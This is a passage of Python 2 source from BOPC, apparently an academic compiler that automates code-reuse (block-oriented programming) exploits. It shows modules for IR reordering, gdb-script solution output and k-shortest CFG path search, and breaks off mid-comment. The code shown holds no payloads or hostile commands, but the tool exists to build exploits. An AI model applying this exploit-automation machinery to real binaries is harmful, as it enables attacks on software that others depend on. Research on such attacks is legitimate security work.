    "path": "source/optimize.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# optimize.py\n#\n# This module performs several optimizations to the generated IR that aim to increase the chances\n# of finding a trace (for the given IR) on the target CFG.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport compile  as C\nimport calls\nimport networkx as nx\nimport itertools\nimport struct\nimport copy\n\n\n# -------------------------------------------------------------------------------------------------\n# optimize: This is the main class (derived from \"compile\") that optimizes the generated IR.\n#\nclass optimize( C.compile ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_stmt_regs(): This function gets all registers that are being used in a statement.\n    #\n    # :Arg stmt: The statement to get registers from.\n    # :Ret: A list of all registers (int) that are being used by the statemet\n    \n    def __get_stmt_regs( self, stmt ):\n        if   stmt['type'] == 'varset': return []\n        elif stmt['type'] == 'regset': return [stmt['reg']]\n        elif stmt['type'] == 'regmod': return [stmt['reg']]\n        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]\n        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]\n        elif stmt['type'] == 'call'  : return stmt['args']\n        elif stmt['type'] == 'cond'  : return [stmt['reg']]\n        else:\n            return []\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __depends(): This function checks whether statement s2 depends on statement s1. Dependencies\n    #       occur at the registers and they are defined as follows:\n    #           [0]. entry  -> *            (depends on everything)\n    #           [1]. varset -> varset \n    #           [2]. regset -> regset / varset\n    #           [3]. regmod -> regset / memrd\n    #           [4]. memrd  -> regset / regmod\n    #           [5]. memwr  -> regset / regmod / memrd\n    #           [6]. call   -> regset / regmod / memrd\n    #           [7]. cond   -> regset / regmod / memrd\n    #           [8]. *      -> return       (everything depends on it)\n    #\n    # :Arg s1: First statement\n    # :Arg s2: Second statement\n    # :Ret: True if s2 depends on s1. False otherwise.\n    #\n    def __depends( self, s1, s2 ):\n        s1_regs = set(self.__get_stmt_regs(s1))\n        s2_regs = set(self.__get_stmt_regs(s2))\n\n\n        # ---------------------------------------------------------------------\n        # Case 0: Check whether s1 is the entry (pseudo)statement (and avoid cycles)\n        if s1['type'] == 'entry' and s2['type'] != 'entry':\n            return True\n\n\n        # ---------------------------------------------------------------------\n        # Case 1: Check whether any of the reference names matches\n        elif s1['type'] == 'varset' and s2['type'] == 'varset':\n            for val in s2['val']:                \n                if isinstance(val, tuple) and val[0] == s1['name']:           \n                    return True                     # yes, it depends\n\n\n        # ---------------------------------------------------------------------\n        # Case 2: Check whether any of the reference names matches\n        elif s1['type'] == 'varset' and s2['type'] == 'regset':\n            if isinstance(s2['val'], tuple):\n                for val in s1['val']:               # value dependency\n                    if isinstance(val, tuple) and val[0] == s2['val'][0]:\n                        return True\n\n                if s1['name'] in s2['val'][0]:      # name dependency\n                    return True\n        \n\n        # ---------------------------------------------------------------------\n        # Case 8: Check whether s2 is the return (pseudo)statement (and avoid cycles)\n        elif s1['type'] != 'return' and s2['type'] == 'return':\n            return True\n\n\n        # ---------------------------------------------------------------------\n        # Other Cases: Check whether register matches and s2 assigment happens\n        #       *after* s1 (we can compare UIDs as we're within a group).\n        elif (s1_regs & s2_regs) and s2['uid'] > s1['uid']:\n            return True\n\n\n        # ---------------------------------------------------------------------\n        # Case 7: These are already handled, as conditional statements are not\n        #       moving. Furthermore. semantic analysis has already taken care\n        #       of it.\n\n     \n        return False                                # statements are independent\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ooo_intrl(): This is the internal function that performs the actual rearrangement of the\n    #       statements. It first builds the dependence graph for the statements and then it uses\n    #       a modified version of Kahn's topological sorting algorithm, to find which statements\n    #       can be executed out of order. These statements are packed in the same list, so each\n    #       IR statement now contains a list of statements.\n    #\n    # :Arg stmt_l: A list of statements to make out of order\n    # :Ret: A new list with out of order statements\n    #\n    def __ooo_intrl( self, stmt_l ):\n        if len(stmt_l) == 0: return []              # base check\n\n        G = nx.DiGraph()                            # create a directed graph\n        for s in stmt_l: G.add_node( s[0] )\n\n        # At this point, IR has passed the semantic checks so a statement only depends on the\n        # statements above it. Therefore we only care about distinct pairs (i,j).\n        for i in range(0, len(stmt_l)):\n            for j in range(0, len(stmt_l)):\n                si = stmt_l[i]\n                sj = stmt_l[j]\n\n                if i == j:                          # a statement can't depend on itself\n                    continue\n\n                # print self.__depends(si[1][0], sj[1][0]), si[1][0], sj[1][0]\n                if self.__depends(si[1][0], sj[1][0]):\n                    G.add_edge( sj[0], si[0])       # if j depends on i, then add an edge\n\n\n        # Now, use a modified version of Kahn's topological sorting algorithm to find out the \n        # out of order statements. At each step we extract all nodes (statements) with no\n        # incoming edges and we bucket them together (these statements can be executed in any \n        # order). Then we remove these nodes (along with their edges) and we repeat, until \n        # graph becomes empty.\n        # \n        # Each statement from the 2nd set depends on some statement from the 1st set and therefore,\n        # it must be executed _after_ all statements from previous set.\n        new_l = []                                  # ooo list\n        \n        dbg_arb(DBG_LVL_3, \"Dependence Graph edges:\", G.edges())\n\n        while len(G) > 0:                           # while there are nodes in the dependence graph\n            tG     = G.copy()                       # get a temporary copy of the graph\n            stmt   = ['@__', []]                    # initialize next statement\n            min_pc = INFINITY                       # min PC (start with a huge value)\n\n\n            # for each node with no incoming edges\n            for n in [n for n in tG.nodes() if tG.in_degree(n) == 0]:\n                G.remove_node(n)                    # remove node \n                                                    # (and all adjacent edges from original graph)\n                # keep track of the minimum pc\n                min_pc = int(n[3:]) if int(n[3:]) < min_pc else min_pc\n\n                # append statement to the ooo list\n                stmt[1].append([s[1][0] for s in stmt_l if s[0] == n][0])\n\n            # A jcc will jump to the first instruction of the ooo statements, so we need the min pc\n            stmt[0] = stmt[0] + str(min_pc)         # update pc\n\n            new_l.insert(0, stmt)                   # append list of statement to the new list\n\n        return new_l                                # return that list\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ooo(): This optimization finds which statements can be executed out of order. By allowing \n    #       two statements to be executed out of order, we make our trace searching algorithm more \n    #       flexible, thus giving it more chances to succeed.\n    #\n    #       However, if we rearrange a label or a jump statement, or if we move a statement at a \n    #       different scope of a label or jump, then we'll destroy payload's execution flow. \n    #       Therefore, we fix labels and conditional jumps at their positions and we only rearrange\n    #       the statements that are between them (so, we use labels and jumps as _delimiters_; this\n    #       is why we need labels in the IR at this point)\n    #\n    # :Ret: None.\n    #\n    def __ooo( self  ):\n        dbg_prnt(DBG_LVL_2, \"Searching for Out-Of-Order statements...\")\n        jumps     = ['cond', 'jump']\n        oldir     = copy.deepcopy(self.__ir)        # take a backup of original IR\n        self.__ir = []\n        cstmt_l   = []                              # current statement list\n\n\n        for stmt in oldir:                          # for each statement\n            s = stmt[1][0]                          # get the core statement (no ooo yet)\n\n            if s['type'] == 'label' or s['type'] in jumps:  # we have hit a delimiter. Slice.\n\n                # make statements out of order (also put conditional back to IR)\n                self.__ir = self.__ir + self.__ooo_intrl(cstmt_l) + \\\n                            ([stmt] if s['type'] in jumps else [])\n\n                cstmt_l   = []                      # clear current list\n\n            else: cstmt_l.append(stmt)              # append any statement to current list\n\n\n        if cstmt_l:                                 # do not forget the leftovers (if any)\n            self.__ir += self.__ooo_intrl(cstmt_l)\n\n        del oldir                                   # free memory\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __label_remove(): In case that __ooo is not invoked, we should remove the labels from the IR.\n    #\n    # :Ret: None.\n    #\n    def __label_remove( self ):\n        dbg_prnt(DBG_LVL_2, \"Removing labels...\")\n\n        oldir     = copy.deepcopy( self.__ir )      # no ooo => 1 tuple per IR entry\n        self.__ir = []\n\n        for stmt in oldir:                          # for each statement\n            # if we have a LABEL (no ooo yet), don't copy it to the new list\n            if stmt[1][0]['type'] != 'label': self.__ir.append( stmt )\n\n        del oldir                                   # free memory\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __rewrite(): This optimization rewrites some function calls from equivalent groups. Thus,\n    #       it increases the likelihood of finding a solution (e.g., when puts() is not available,\n    #       BOPC searches for print()).\n    #\n    # :Ret: None.\n    #\n    def __rewrite( self ):\n        dbg_prnt(DBG_LVL_2, \"Rewriting library and system calls...\")\n\n        for stmt in self.__ir :                     # for each statement            \n            if stmt[1][0]['type'] == 'call': \n            \n                for group in calls.call_groups__:\n                    name = stmt[1][0]['name']\n\n                    if name in group:\n                        stmt[1][0]['alt'] = [f for f in group if f != name]\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n        error(\"Rewrite optimiazation is incomplete\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __future(): This function is reserved for future optimizations. \n    #\n    # :Ret: None.\n    #\n    def __future( self ):\n        warn(\"Add future optimizations...\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Ret: A class object.\n    #\n    def __init__( self, ir ):\n        self.__ir = ir                              # IR to optimize\n\n        super(self.__class__, self).__init__('')    # invoke base class constructor\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getitem__(): Get i-th statement from IR. Out-of-order statements are groups in the same \n    #       list entry, so we cannot find them in O(1) without an auxiliary data struct. For now,\n    #       we simply perform a linear search.\n    #\n    #       This function overloads compile.__getitem__()\n    #\n    # :Arg idx: Index of the IR statement\n    # :Ret: The requested IR statement\n    # \n    def __getitem__( self, idx ):\n        assert( idx >= 0 )                          # bounds checks\n\n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            for stmt in stmt_r:                     # for each \"parallel\" statement\n                if stmt['uid'] == idx: return stmt  # if index found return statement\n\n        raise IndexError(\"No statement with uid = %d found\" % idx )\n        # return []                                 # failure. Statement not found\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # optimize(): Optimize the generated IR\n    #\n    # :Arg mode: Mode that optimizer should operate on.\n    # :Ret: None.\n    #\n    def optimize( self, mode ):\n        dbg_prnt(DBG_LVL_1, \"Optimizer started. Mode: '%s'\" % mode)\n\n        try:\n            # Each optimization mode, executes some functions. Based on the mode execute the \n            # appropriate sequence of functions.\n            for opt in {\n                'none'    : [self.__label_remove],\n                'ooo'     : [self.__ooo],\n                'rewrite' : [self.__rewrite],\n                'full'    : [self.__ooo, self.__future]\n            }[ mode ]: opt()\n\n        except KeyError: \n            fatal(\"Invalid mode '%s'\" % mode )      # invalid mode\n\n        dbg_prnt(DBG_LVL_1, \"Optimization completed.\")\n\n\n        self._calc_stats()                          # re-calculate statistics\n\n        # At this point we can make IR immutable, as we won't make any changes to it.\n\n        dbg_prnt(DBG_LVL_2, 'Optimized IR:')\n\n        for pc, group in self.__ir:                 # print optimized IR\n            dbg_prnt(DBG_LVL_2, '%s %s %s' % ('-'*32, pc, '-'*32))\n            \n            for stmt in group:\n                dbg_arb(DBG_LVL_2, '', stmt)\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # itergroup(): Iterate over all group statements.\n    #\n    # :Ret: Every time function returns a different group of statement.\n    # \n    def itergroup( self ):        \n        for _, stmt_r in self.__ir:                 # for each IR statement list\n            yield stmt_r                            # return next statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get_ir(): Return the compiled IR.\n    #\n    # :Ret: The IR.\n    #\n    def get_ir( self ):\n        return self.__ir\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # emit(): Emit IR and save it into a file\n    #\n    # :Ret: None.\n    #\n    def emit( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Writing SPL IR to a file...\")    \n         \n        try:    \n            file = open(filename + '.ir', 'w')\n\n            for pc, stmt_l in self.__ir:\n                for stmt in stmt_l:\n                    opt  = '%s %s ' % (pc, stmt['type'])\n\n                    # -------------------------------------------------------------------\n                    if stmt['type'] == 'varset':\n                        opt += '%s ' % stmt['name']\n                        \n                        for val in stmt['val']:\n                            if isinstance(val, tuple): \n                                opt += 'var %s ' % val[0]\n                            else:                      \n                                if len(val) != 8:\n                                    for i in range(0, len(val), 8):\n                                        opt += 'num %s ' % val[i:i+8].encode(\"hex\")\n                                        print val[i:i+8],val[i:i+8].encode(\"hex\")\n                                else:\n                                    opt += 'num %s ' % val.encode(\"hex\")\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'regset':\n                        opt += '%d %s ' % (stmt['reg'], stmt['valty'])\n                        if stmt['valty'] == 'num': opt += '%d' % stmt['val']\n                        else:                      opt += '%s' % stmt['val'][0]\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'regmod':\n                        opt += '%d %c %d' % (stmt['reg'], stmt['op'], stmt['val'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'memrd':\n                        opt += '%d %d' % (stmt['reg'], stmt['mem'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'memwr':\n                        opt += '%d %d' % (stmt['mem'], stmt['val'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'label':\n                        pass\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'call':\n                        # dirty is not used at all\n                        opt += '%s %s' % (stmt['name'], ' '.join('%d' % a for a in stmt['args']))\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'cond':\n                        opt += '%d %s %d %s' % (stmt['reg'], stmt['op'], stmt['num'], stmt['target'])\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'jump':\n                        opt += '%s' % stmt['target']\n\n                    # -------------------------------------------------------------------\n                    elif stmt['type'] == 'return':\n                        # dirty is not used at all\n                        opt += '%x' % stmt['target']\n\n\n                    file.write( \"%s\\n\" % opt )\n                       \n            file.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Done. SPL IR saved as %s\" % filename + '.ir')\n\n        except IOError, err:\n            fatal(\"Cannot create file: %s\" % str(err))    \n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/output.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# output.py:\n#\n# This module deal with the representation of the solution.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n# [1]. Support the other formats (right now only 'gdb' is supported). To do that, make all \n#      functions dispatchers, that invoke internal ones (e.g., register() will use self.__format to\n#      choose between __gdb_register(), __idc_register() or __raw_register()).\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport time\n\n\n\n# -------------------------------------------------------------------------------------------------\n# output: This class transforms the solution into the appropriate format and dumps it into a file.\n#\nclass output( object ):\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. \n    #\n    # :Arg format: The format to use\n    #\n    def __init__( self, fmt ):\n        self.__format = fmt                         # current formate\n        self.__output = ''                          # the final output string\n\n\n        # check if format is valid\n        if self.__format not in ['raw', 'gdb', 'idc']:\n            fatal(\"Unknown format '%s'\" % self.__format)\n        \n        if self.__format != 'gdb':\n            fatal(\"Format '%s' is not implemented\" % self.__format)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # comment(): Add a comment to the output file.\n    #\n    # :Arg comment: Comment to add\n    # :Ret: None.\n    # \n    def comment( self, comment ):\n        self.__output += '# %s\\n' % comment\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # newline(): Simply add a blank newline.\n    #\n    # :Ret: None.\n    # \n    def newline( self ):\n        self.__output += '\\n'\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # breakpoint(): Add a breakpoint to the output file.\n    #\n    # :Arg address: Address of the breakpoint\n    # :Ret: None.\n    # \n    def breakpoint( self, address ):\n        self.__output += 'break *0x%x\\n' % address\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # register(): Set a register.\n    #\n    # :Arg register: Register to set\n    # :Arg value: Value to write (8 bytes)\n    # :Ret: None.\n    # \n    def register( self, register, value, comment='' ):        \n        self.__output += 'set $%s = %s' % (register, value)\n\n        if comment: \n            self.__output += '\\t# ' + comment\n\n        self.__output += '\\n'\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # memory(): Write to memory.\n    #\n    # :Arg address: Address to write\n    # :Arg value: Value that is being written\n    # :Arg size: Size of the value\n    # :Ret: None.\n    # \n    def memory( self, address, value, size ):\n        if size == 8 and value[0] != '{':\n            cast = '(long long int)'\n        else:\n            cast = ''\n\n        self.__output += 'set {char[%d]} (%s) = %s %s\\n' % (size, address, cast, value)        \n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # external(): External input (from socked, file, etc.)\n    #\n    # :Arg line: -\n    # :Ret: None.\n    # \n    def external( self, line ):\n        fatal('output.external() is not implemented yet')\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # alloc(): Allocate some contigouous memory (pool).\n    #\n    # :Arg varname: Pool name\n    # :Arg size: Pool size\n    # :Ret: None.\n    # \n    def alloc( self, varname, size ):\n        self.__output += 'set %s = malloc(%d)\\n' % (varname, size)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # set(): Set a variable.\n    #\n    # :Arg name: Variable name\n    # :Arg value: Variable's desired value\n    # :Ret: None.\n    # \n    def set( self, name, value ):\n        self.__output += 'set %s = %s \\n' % (name, value)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # save(): Save the current output to a file.\n    #\n    # :Arg binary: Binary file name\n    # :Ret: None.\n    # \n    def save( self, binary ):\n        now    = datetime.datetime.now()            # get current timestamp\n        banner = textwrap.dedent(\"\"\"\\\n            #\n            # This file has been created by BOPC at: %s\n            # \n        \"\"\" % now.strftime(\"%d/%m/%Y %H:%M\"))       # create a banner\n\n\n        # make sure that file has a unique name, as we can have >1 solutions\n        filename = '%s_%x.%s' % (binary, time.time(), self.__format)\n\n        try:    \n            out = open(filename, 'w')               # create file\n\n            out.write(banner)                       # write banner first\n            out.write(self.__output)                # then output\n            out.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Solution has saved as '%s'\" % bolds(filename))\n            dbg_prnt(DBG_LVL_2, \"Solution file:\\n%s\" % banner + self.__output)\n\n\n            dbg_prnt(DBG_LVL_2, \"Waiting for a second to prevent solutions with the same timestamp...\")\n            time.sleep(1)                           # prevent solutions with the same filename\n            \n        except IOError, err:\n            error(\"Cannot create output file: %s\" % str(err))\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/path.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# path.py:\n#\n# This module is the \"assistant\" of the Symbolic Execution engine. Clearly, the unrestricted usage\n# of symbolic execution can cause BOPC to run for ever (bottleneck). To address this problem,\n# we aim to restrict the Symbolic Execution as much as possible. So, instead of letting Symbolic\n# Execution engine to use it's build-in BFS for the path exploration, we find out (i.e., guess) the\n# exact path(s) and we _guide_ the Symbolic Execution engine to strictly follow them. Therefore, we\n# avoid the exponential growth of the states.\n#\n# In case that the recommended path does not work out (due to the unsatisfiable constraints), we\n# need to try another path and so on. In the worst case we will try all the paths and the result\n# will be the same with the unguided Symbolic Execution. Having a way to quickly generate candidate\n# paths is crucial here.\n#\n# The trick here is to \"rank\" the paths, starting from the one which is more likely to succeed. A\n# good metric here is the path length in the CFG (shortest paths in CFG are not like shortest paths\n# in normal graphs, due to the context sensitivity). Therefore, we start with the shortest path\n# first, then we move on the second shortest path and so on.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n# [1]. Implement Lawler's modification in k_shortest_paths() to avoid duplicates (or ue Eppstein's\n#      algorithm to deal with looping paths).\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport networkx as nx\nimport queue\nimport heapq\nimport traceback\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n_NULL_NODE   = -1                                   # null (non-existent) node\n_SINK_NODE   = 0                                    # the sink node in delta graph\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _queue_obj: This class is the wrapper object that is used in the priority queue.\n#\nclass _queue_obj( object ):\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize class members.\n    #\n    # :Arg data: Object's data\n    # :Arg weight: Object's weight (used for the comparisons)\n    #\n    def __init__( self, data, weight ):\n        self.weight = weight\n        self.data   = data\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __cmp__(): Overloaded operator for object comparison.\n    #\n    # :Arg other: The other object to compare.\n    # :Ret: Function retuns a <0 value if self.weight < other.weight, 0 if \n    #       self.weight == other.weight and a >0 value if self.weight > other.weight.\n    #\n    def __cmp__( self, other ):\n        return cmp(self.weight, other.weight)\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _cs_ksp_intrl: This class finds the k shortest context sensitive loopless paths with non-negative\n#   edge costs from a single source to a single destination using Yen's algorithm as described in\n#   [1]. Algorithm first finds the shortest paths (using any of the well known  algorithms) and \n#   then it finds K-1 deviations of the shortest path.\n#\n#   The problem here, is that shortest paths are CFG shortest paths and therefore they are context\n#   sensitive. Thus we have to modify the existing algorithm. TODO: rewrite\n#\n#\n# [1]. Yen, Jin Y. \"Finding the k shortest loopless paths in a network.\" management Science \n#       17.11 (1971): 712-716.\n#\nclass _cs_ksp_intrl( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_precall_stack(): This function calculates the \"precall\" stack for a given node in a\n    #       path. The precall stack is like the regular call stack, but instead of storing the\n    #       return address for every function call, it stores the caller's address (we do this as\n    #       it's more convenient to work with). Precall stack is the \"context\" of the current node.\n    #\n    # :Arg path: A path as a list\n    # :Arg node: The given node to retrieve pre-call stack for\n    # :Ret: The pre-call stack for the given node.\n    #\n    def __get_precall_stack( self, path, node=None ):\n        pcallstack = []\n\n\n        for u, v in to_edges(path):                 # for every edge on the path          \n            if u == node: break                     # if you have reached the target node, stop\n\n            # we can do this, because path is not malformed\n            # get the jump kind of the edge in CFG\n            if self.__G.has_edge(self.__f(u), self.__f(v)):\n                jumpkind = self.__G.get_edge_data(self.__f(u), self.__f(v))['jumpkind']\n            else:\n                error(\"Edge (0x%x -> 0x%x) is missing from the CFG\" % (u, v))\n\n            # push on calls, pop on returns (as a regular stack works)\n            if   jumpkind == 'Ijk_Call': pcallstack.append(u)\n            elif jumpkind == 'Ijk_Ret':  pcallstack.pop()\n\n\n        return pcallstack                           # return the precall stack\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. \n    #\n    # :Arg graph: Graph to work on\n    # :Arg shortest_path_cb: A callback function for calculating shortest paths\n    # :Arg f: A lambda function to transform nodes before used as \"indices\" in the graph\n    #\n    def __init__( self, graph, shortest_path_cb, f ):\n        self.__G             = graph                # simply store arguments locally\n        self.__shortest_path = shortest_path_cb\n        self.__f             = f\n\n    \n\n    # ---------------------------------------------------------------------------------------------\n    # k_shortest_paths(): As the name suggests, this function finds the k shortest loopless paths.\n    #       The only issue here is that Yen's algorithm can return duplicate paths. We can fix this\n    #       issue by implementing \"Lawler's modification\". The algorithm also uses an optimization:\n    #       Instead of removing edges and nodes from the graph and adding them later, we simply\n    #       \"mark\" them and we instruct each shortest path algorithm to explicitly avoid them\n    #       during search. \n    #\n    # :Arg source: The source node\n    # :Arg destination: The destination node\n    # :Arg cur_uid: UID of the SPL statement that is about to execute\n    # :Arg K: The number of paths to search for\n    # :Ret: This function is actually a generator. Every time that's invoked it returns a tuple \n    #       (cost, path) that contains the cost of the next shortest path along with that path.\n    #       If such a path does not exists, function returns (-1, []).\n    #\n    def k_shortest_paths( self, source, destination, cur_uid, K ):\n        assert( K > 0 )                             # we should search for at least 1 path\n\n        source      = int(source)                   # source and destination may be 'long'\n        destination = int(destination)\n\n\n        # find the first shortest path (along with its auxiliary information)\n        path, pathlens, expaths = self.__shortest_path( source, destination, cur_uid )        \n        length = pathlens[-1]\n\n\n        if length < 0 or length == INFINITY:        # if path doesn't exist, stop\n            return\n\n        yield length, expaths[-1]                   # start with the shortest expanded path\n\n\n        # NOTE: We start to work with path and not with expaths[-1]. If path has cycles,\n        # then we may return the same path >1 times. Not a big deal though.       \n\n        A = [path]                                  # the k shortest paths\n        B = []                                      # heap for next potential shortest path\n        L = [ pathlens[:] ]                         # additional tables for previous path lengths\n        E = [ expaths[:]  ]                         # and previous expanded paths\n\n        prev_expaths = [ expaths[-1][:] ]           # remember all previous expanded paths\n    \n\n        # -------------------------------------------------------------------------------\n        # Each iteration finds the next shortest path\n        # -------------------------------------------------------------------------------   \n        for k in range(1, K):                       # for each shortest path deviation\n\n            # spur node ranges from first to one before the last node in the previous (k-1) path\n            for i in range(0, len(A[k-1]) - 1):\n                spur = A[k - 1][i]                  # pick a spur node\n\n                # root path: Path from the source to the spur node of the (k-1) path\n                rootpath    = A[k-1][:i+1]\n                rootpathlen = L[k-1][i]\n\n                \n                # Now it's time for our optimization: Instead of removing edges and nodes, we\n                # set to them the \"avoid\" attribute and we explicitly instruct shortest path\n                # algorithm to avoid them during search. The \"avoid\" operation has to be \n                # context sensitive\n\n                for p in A:                         # for each previous path\n                    if len(p) > i and rootpath == p[:i+1]:\n                        # \"remove\" edge\n                        self.__G[ self.__f(p[i]) ][ self.__f(p[i+1]) ][ 'avoid' ] = \\\n                                    self.__get_precall_stack(p, p[i])\n  \n                    # print '\\tDROP EDGE', self.__f(p[i]), self.__f(p[i+1]), self.__get_precall_stack(p, p[i])\n\n\n\n                for node in rootpath[:-1]:          # for each node in rootpath (except spur node)\n                    # \"remove\" node\n                    self.__G.node[ self.__f(node) ][ 'avoid' ] = \\\n                                self.__get_precall_stack(rootpath, node)\n\n                    # print '\\tDROP NODE', self.__f(node), self.__get_precall_stack(rootpath, node)\n\n\n                # calculate spur path from the spur node to the destination\n                # (the rootpath is needed for the case of CFG)\n\n                # this destroys 'depth' and 'path', so we have to 